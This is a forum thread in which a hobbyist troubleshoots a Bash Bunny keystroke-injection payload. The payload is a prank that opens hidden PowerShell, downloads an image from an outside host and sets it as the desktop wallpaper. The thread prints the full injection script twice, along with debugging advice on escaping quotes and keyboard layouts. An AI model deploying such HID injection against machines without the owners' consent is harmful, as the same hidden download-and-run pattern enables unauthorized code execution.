First payload experiments, no typing from HID


Dragus

Posted

Hello everyone,
I've been fiddling with multiple payloads for a while on multiple computers. I've seen various results (depending on the PC) and got very close (I think) to making a few of the payloads work properly after changing their configuration.

One I'd like to get working for starters is the Wallpaper Changer of Doom.

It's not related to that specific payload, but on the Windows 7 computer, it opens the command prompt (with "CMD" in it) and nothing happens. The first time I plugged it in, it installed a driver (from Windows) for a few minutes.

I think it's an issue related to Quack (typing characters), here's what I got so far:

LED SETUP
ATTACKMODE HID
LED ATTACK
Q GUI r
Q DELAY 1000
Q STRING "powershell -w h \"\$p=\$home+'\z.jpg';iwr magikweb.ca/z.jpg -O \$p;SP 'HKCU:Control Panel\Desktop' WallPaper \$p;1..29|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}""
Q ENTER

It seems to be blinking yellow from that point.

Any idea how I could debug this?

Posted

Hmm, on your computer when you hit "windows key + r" what happens?

If nothing, you have a keyboard like mine that can disable the windows key and that also stops the BB GUI command. If not, try opening notepad and set a payload to just type string to see if anything is coming across at all.

Posted

I tried it, Windows + R opens the command prompt with "cmd" written in it.

It's the same thing I see when executing the payload, but after that, no text is written.

I'll try a payload to only write text and see from there (it'll take a while so I learn the basics further), it's a good idea since it would isolate the issue.

Thanks for the reply!

Posted

Here's a follow-up!

I think there's a typo on the YouTube video or Github, not sure from where yet. There was an unescaped quote at the end of the line. This works "better":

LED SETUP
ATTACKMODE HID
LED ATTACK
Q GUI r
Q DELAY 1000
Q STRING "powershell -w h \"\$p=\$home+'\z.jpg';iwr magikweb.ca/z.jpg -O \$p;SP 'HKCU:Control Panel\Desktop' WallPaper \$p;1..29|%{RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1}\""
Q ENTER

Now the result is that I see Powershell open up and close right away. I'm not sure if it's the normal behavior since there are many variations of this prank script. (if someone knows, enlighten me)

Also, that's me being slightly lazy, but in this script's context, what would the variable $home typically point to? I wanna debug further and try to find the image.

Finally, do you think that the image fetching follows the URL (there are redirections)? Or it fails because the first answer wasn't HTTP 200?

Thank you for any ideas, I'm happy I progressed!

Posted

@Dragus

You can try adding a 

pause

at the end of your Powershell command. This will keep the Powershell window open until you press Enter so you can see errors and the like. Very useful.

$home points to your current user's home directory.

E.g. if your name is 'User' then it will go to:

C:\Users\User

Not sure about $p. Old me might've known..

Posted

Thanks! That helped me find the reason for my next problem.

Here is what it really writes in the command prompt:

powershell -w h `$p=$home+`<z.jpg`;iwr https:ééwww.magikweb.caéz.jpg -O $p;SP `HKCU:Control Panel<Desktop`WallPaper $p;1..29>%^RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True;sleep 1¨pause

That's really messy. It seems like it's assuming I have a US English keyboard. Is that a common issue? I would think a lot of non-US countries' users would have a similar issue.

Posted

I forgot to add context in my last post. I thought about using DUCKY_LANG, but my keyboard (and most people here) does not follow 2-letter country codes.

Here's one of mine (the one I use the most): https://prnt.sc/ml9yya

Is there a way for the Bash Bunny to automatically adapt to the target's environment? (Windows' current keyboard)

Archived

This topic is now archived and is closed to further replies.
